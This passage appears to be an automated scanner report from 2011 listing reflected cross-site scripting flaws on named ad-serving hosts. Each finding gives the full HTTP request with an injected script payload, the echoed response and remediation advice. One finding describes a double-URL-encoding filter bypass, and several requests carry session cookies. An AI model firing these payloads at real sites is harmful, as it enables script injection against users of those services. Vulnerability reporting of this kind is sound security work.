This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 was submitted in the admeld_callback parameter. This input was echoed as 3a018';alert(1)//29ac3d5f519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /v0/admeld-match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; bh="b!!!$E!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"; lifb=ORtsV69Ah<fqyac; ih="b!!!!B!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=.Sexf5_x-bh5ryLshEiqN6hm(mMpyr; pv1="b!!!!7!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~"
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Cache-Control: private Content-Length: 261 Content-Type: text/javascript Age: 0 Proxy-Connection: close Server: YTS/1.18.4
document.write('<img width="0" height="0" src="http://tag.admeld.com/match3a018';alert(1)//29ac3d5f519?admeld_adprovider_id=420&external_user_id=0&expiration=1297968783" /><img width="0" height="0" sr ...[SNIP]...
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8cd2'%3balert(1)//13a730e6121 was submitted in the admeld_adprovider_id parameter. This input was echoed as b8cd2';alert(1)//13a730e6121 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78b8cd2'%3balert(1)//13a730e6121&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:02 GMT X-Name: rtb-o06 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19652'%3balert(1)//c53cf824e4b was submitted in the admeld_callback parameter. This input was echoed as 19652';alert(1)//c53cf824e4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match19652'%3balert(1)//c53cf824e4b HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT X-Name: rtb-o03 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5e8'%3balert(1)//fba03bbdfb2 was submitted in the admeld_adprovider_id parameter. This input was echoed as ff5e8';alert(1)//fba03bbdfb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73ff5e8'%3balert(1)//fba03bbdfb2&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2d68'%3balert(1)//7361267a395 was submitted in the admeld_callback parameter. This input was echoed as e2d68';alert(1)//7361267a395 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche2d68'%3balert(1)//7361267a395 HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 6c86c<script>alert(1)</script>03ede497a81 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=8797686c86c<script>alert(1)</script>03ede497a81&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:30 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2536
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "8797686c86c<script>alert(1)</script>03ede497a81"
The value of the placementId request parameter is copied into an HTML comment. The payload 842ea--><script>alert(1)</script>48d2a0518b4 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369842ea--><script>alert(1)</script>48d2a0518b4&pid=879768&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:21 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3402
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1341369842ea--><script>alert(1)</script>48d2a0518b4" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 68d8c--><script>alert(1)</script>c52ad980c6e was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=879768&ps=-168d8c--><script>alert(1)</script>c52ad980c6e&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:42 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-168d8c--><script>alert(1)</script>c52ad980c6e" -->
...[SNIP]...
1.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeb5"-alert(1)-"cefe6b77701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&dbeb5"-alert(1)-"cefe6b77701=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754832540&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F66 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:40 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 18:53:40 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
